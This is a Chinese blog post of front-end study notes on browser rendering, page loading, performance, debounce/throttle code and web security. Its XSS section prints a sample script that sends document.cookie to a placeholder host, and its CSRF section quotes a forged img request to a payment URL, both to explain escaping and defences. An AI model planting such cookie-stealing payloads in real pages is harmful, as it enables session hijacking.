JS运行环境

已于 2023-03-11 11:23:54 修改
阅读量278 收藏
点赞数
分类专栏: 网络技术 文章标签: 网络 http 网络协议
于 2023-02-05 10:44:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46151381/article/details/128888425
版权

0 浏览器内核

1 网页渲染

1.0 CSS图层

重绘repaint以图层为单位(3D变换/canvas/video/css3动画会创建图层)。属性:外观如背景边框改变

重排(回流)reflow:重绘不一定重排,重排必然重绘。属性:引起位置改变如浮动定位

注:display:none 会触发 reflow,而 visibility:hidden 只会触发 repaint,因为没有发生位置变化。

       使用visibility触发重绘;直接使用opacity即触发重绘,又触发重排

优化将多次改变样式属性的操作合并成一次操作,预先定义好class,然后修改className

        利用文档碎片

        为动画元素新建图层,提高动画元素的z-index 

1.1 加载过程

注意:网络连接是TCP协议(先),传输内容是HTTP协议(后)

从用户输入URl按下回车,一直到用户能看到界面,期间经历了什么?

  • 1.DNS解析(缓存):将域名解析为IP
  • 2.进行TCP(协议)连接,三次握手

  • 3.浏览器根据IP地址发送请求,得到响应HTML源代码

1.2 渲染过程

  • 4.浏览器开始解析html

      --解析html,生成DOM树(img不阻塞DOM,可能有强缓存,此时不必请求

      --解析CSS,生成CSSOM树(css放head:先css后html,否则放body最后先css+html后css渲染重复

     --合并成一个render树

     --遇到script标签暂停渲染,优先加载并执行js代码,完成后继续(放body最后);计算各个DOM的尺寸定位;异步CSS/图片加载可能触发重新渲染

     --最终展示界面

  •    5.断开TCP连接,四次挥手(确保数据的完整性)

const img1 = document.getElementById('img1')
img1.onload = function () {
    console.log('img loaded')//2:
}

window.addEventListener('load', function () {
    console.log('window loaded')//3:资源全部加载完才执行,包括图片
})

document.addEventListener('DOMContentLoaded', function () {
    console.log('dom content loaded')//1:DOM渲染完即可执行,图片视频可能未下载
})

1.3 渲染原理

CSS阻塞

        style 标签中的样式,由html解析器异步解析,不会阻塞DOM解析

        link中引入的样式,由CSS解析器同步解析,不会阻塞DOM解析。因为DOM解析和CSS解析是两个并行的进程。

JS阻塞

        阻塞DOM解析和后续js执行。

2 性能优化

2.1 加载更快 

减少资源体积:压缩代码,UI库按需打包

减少访问次数:

        -合并代码:script文件合并

        -SSR服务端渲染:将网页和数据一起加载一起渲染;非SSR是先加载网页,再加载并渲染数据

        -缓存,如内容缓存。静态资源加hash后缀;根据文件内容计算hash;文件内容不变,则hash不变,则url不变;url和文件不变,则会自动触发http缓存机制返回304

        -更快的网络:CDN节点进行外部资源加速

2.2 渲染更快

CSS放head;懒加载:给一张默认图片,上滑加载更多;路由懒加载

js放body最下面;尽早开始JS执行,用DOMContentLoaded触发

缓存DOM查询;多个DOM操作一起插入DOM结构

节流防抖。

 

3 节流防抖 

防抖:用户输入结束时,才触发change事件;关注结果

节流:拖拽或scroll期间触发某个回调,设置一个时间间隔;关注过程

注意:实际使用lodash

// 防抖
function debounce(fn, delay = 500) {
    // timer 是闭包中的
    let timer = null

    return function () {
        if (timer) {
            clearTimeout(timer)
        }
        timer = setTimeout(() => {
            fn.apply(this, arguments)
            timer = null
        }, delay)
    }
}

input1.addEventListener('keyup', debounce(function (e) {
    console.log(e.target)
    console.log(input1.value)
}, 600))


// 节流
function throttle(fn, delay = 100) {
    let timer = null

    return function () {
        if (timer) {
            return
        }
        timer = setTimeout(() => {
            fn.apply(this, arguments)//argument是为了传e,因为外面包裹了一层函数
            timer = null
        }, delay)
    }
}

div1.addEventListener('drag', throttle(function (e) {
    console.log(e.offsetX, e.offsetY)
}))

4 网络安全

4.1 XSS攻击

攻击者在网页中嵌入script脚本,获取用户cookie,服务器配合跨域

替换特殊字符,<script>变为&lt;script&gt;直接显示,而不会作为脚本执行

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>XSS Demo</title>
</head>
<body>
    <p>XSS Demo</p>
    <div id="container">
        <p>123123</p>
        &lt;script&gt;
            var img = document.createElement('image')
            img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
        &lt;/script&gt;
    </div>

    <script>
        const str = `
            <p>123123</p>
            <script>
                var img = document.createElement('image')
                img.src = 'https://xxx.com/api/xxx?cookie=' + document.cookie
            </script>
        `
        const newStr = str.replaceAll('<', '&lt;').replaceAll('>', '&gt;')
    </script>
</body>
</html>

vue/react自动屏蔽xss,除非按照如下使用

4.2 XSRF攻击

攻击者发送一封邮件,隐藏着<img src=xxx.com/pay?id=200/>,查看邮件就会帮他人购买商品(黑客诱导用户去访问另一个网站的接口,伪造请求)

严格的跨域请求限制,如判断请求来源;

为cookie设置Same Site,禁止跨域传递cookie;

使用post接口,增加指纹/短信/密码校验

4.3 点击劫持

判断域名是否相同;禁止第三方

4.4 其他

史学娇
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Nginx+SSL+Node.js运行环境配置教程
09-30
主要介绍了Nginx+SSL+Node.js运行环境配置教程,本文用反向代理的方式代理基于Node.js的Web应用,需要的朋友可以参考下
javascript运行环境
12-13
node,一个基于 Chrome V8 引擎的 JavaScript 运行环境
JS开发环境运行环境
qq_44581775的博客
10-16 3058
本文主要介绍JS开发环境运行环境,其中开发环境部分主要内容有IDE、Git、JS模块化、打包工具、上线回滚的流程和Linux基础命令;运行环境主要内容有页面加载过程解析、性能优化和安全性。
js 环境 & 作用域 & 作用域链 & 提升
青蛙king的博客
11-21 484
目录 一、执行环境 1、什么是执行环境? 2、执行环境分为两种 (1)、全局执行环境 (2)、函数执行环境 二、作用域 1、全局作用域 2、局部作用域 (1)、函数作用域 (2)、ES6的块级作用域 三、作用域链 1、作用域链 2、延长作用域链(了解) 四、提升 1、变量提升 2、函数提升 (1)、只有通过 “函数声明” 形式创建的函数,才能被提升。 (2)...
js获取当前客户端系统 环境
肖皓文
12-21 2306
/* * @Autor: 肖皓文 * @Date: 2020-12-21 19:24:11 */ /** * @return { Object } */ const ua = navigator.userAgent.toLowerCase(); const platform = {}; const MAP_EXP = { Weixin: /micromessenger/i, Mac: /(mac os x)\s+([\w_]+)/, Windows: /(window.
【前端 JsJs/Node.js怎么读取系统环境变量(用户变量/系统变量)最简单版
anjue1997的博客
01-12 2978
【前端 JsJs/Node.js怎么读取系统环境变量(用户变量/系统变量)最简单版
JavaScript环境变量
llkkjj123456789的博客
04-10 523
在终端里: gedit ~./profile。2.在./profile文件里 新建用户环境变量。常用的环境变量:PATH,JAVA_HOME。(在Linux系统中 以.开头的为隐藏文件)2. 执行命令echo ls cd cp。1.用文本编辑器打开~./profile。3. If判断语句、while逻辑循环。都定义在 ~/.profile。就是在这个环境中的变量。3.注销用户,重新登录。对当前用户有效的变量。
Node.js中,在cmd界面,进入退出Node.js运行环境的方法
01-02
1、输入node回车即可进入Node.js运行环境。 2、退出只需要连续按两次Ctrl+C或者输入“.exit”回车即可。 以上这篇Node.js中,在cmd界面,进入退出Node.js运行环境的方法就是小编分享给大家的全部内容了,希望能给大家...
Node.js Javascript运行环境(runtime environment)
07-23
Node.js是一个Javascript运行环境(runtime environment),发布于2009年5月,由Ryan Dahl开发,实质是对Chrome V8引擎进行了封装。Node.js对一些特殊用例进行优化,提供替代的API,使得V8在非浏览器环境运行得更好...
node.js安装包,js运行环境
07-20
node.js安装包,js运行环境
比较全的使用JavaScript获取当前网页运行环境的明细,比如操作系统类型,设备类型
SAP 资深技术专家 Jerry Wang 的技术分享
04-01 817
<html> <script> var OS = { "WINDOWS": "win", "MACINTOSH": "mac", "LINUX": "linux", "IOS": "iOS", "ANDROID": "Android", "BLACKBERRY": "bb", "WINDOWS_PHONE": "winphone" }; v...
js判断设备及环境
似水流年QC的博客
05-13 999
获取用户设备信息是前端常见的场景,本人搜集并亲测通过,现在分享一下~~~ let u = navigator.userAgent---获取用户设备信息 // 是否IE内核 let trident = u.indexOf('Trident') > -1 // 是否苹果,谷歌内核 let webkit = u.indexOf('AppleWebKit') > -1 // 是否火狐内核 let gecko = u.indexOf('Gecko') > -1...
JavaScript代码是怎么在浏览器里面运行起来的?
heyYouU的博客
11-18 886
js代码是怎么被执行的?简单了解一下浏览器内核与JS引擎。
使用JS获取当前页面的URL(网址信息)
New个对象喝咖啡
09-28 1175
window.location.href(当前URL) 结果如下: http://www.myurl.com:8866/test?id=123&username=xxx window.location.protocol(协议) 结果如下: http: window.location.host(域名 + 端口) 结果如下: www.myurl.com:8866 window.location.hostname(域名) 结果如下: www.myurl.com window.location.po
获取当前浏览器版本环境
lys20000913的博客
03-21 175
获取浏览器版本环境
史上无敌的超级详细的Node Js 环境搭建步骤
m0_67094505的博客
09-06 9140
Element有两种开发模式,一种是传统开发模式,另一种是前后端分离开发模式。知识总结安装步骤:1、下载nodeJS的安装包2、解压nodeJS的解压包,在根目录下新增两个文件夹和node_cache3、配置环境变量NODE_HOME:配置的是nodeJS解压的根路径Path检验是否配置成功:node -v4、配置npm的全局模块的下载地址检验是否配置成功:本机用户找到.npmrc文件,查看是否有以上三行脚本5、下载github的Vue的项目解压。
JavaScript的前端运行环境和后端运行环境的解析及区别
zhouang1的博客
09-12 1539
此文章可以清楚的了解JavaScript的运行环境
js判断用户当前网络状态
qq_41818857的博客
12-15 3317
通常来说我们接触到3种方法,分别是 1、通过window.navigator.onLine属性,返回一个布尔值来判断当前网络状态。 if (window.navigator.onLine) { console.log('网络正常!'); } else { console.log('网络中断!'); } 2、通过h5事件online、offline来监听网络状态,onlin
如何运行Node.js脚本及读取环境变量
专注于大数据方向,区块链,前后端,数据可视化,人工智能等领域
05-27 2439
您也可以使用“shebang”行将这些信息嵌入到您的JavaScript文件中。运行Node.js程序的通常方法是运行全局可用的Node命令(一旦安装Node.js),并传递要执行的文件的名称。”是文件中的第一行,告诉操作系统要使用哪个解释器来运行脚本。下面是一个访问USER_ID和USER_KEY环境变量的示例,我们在上面的代码中设置了这些变量。如果节点项目中有多个环境变量,也可以在项目的根目录中创建.env文件,然后在运行时使用。以同样的方式,您可以访问您设置的任何自定义环境变量。
vscode 配置 js运行环境
最新发布
07-23
要在 VS Code 中配置 JavaScript 运行环境,你可以按照以下步骤进行操作: 1. 首先,确保你已经在计算机上安装了 Node.js。你可以从 Node.js 官方网站(https://nodejs.org/)下载并安装它。 2. 打开 VS Code,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值